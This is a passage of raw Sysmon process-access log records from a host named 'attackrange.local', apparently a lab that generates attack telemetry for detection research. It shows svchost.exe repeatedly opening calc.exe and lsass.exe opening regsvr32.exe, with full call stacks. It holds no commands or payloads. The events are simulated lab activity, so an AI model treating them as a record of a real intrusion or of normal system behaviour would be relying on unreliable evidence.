22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360225Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360224Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360223Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360222Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360221Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360220Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360219Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360218Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360217Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360216Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360215Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360214Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360213Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360212Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360211Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360210Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360209Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360208Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360207Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360206Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360205Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360204Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 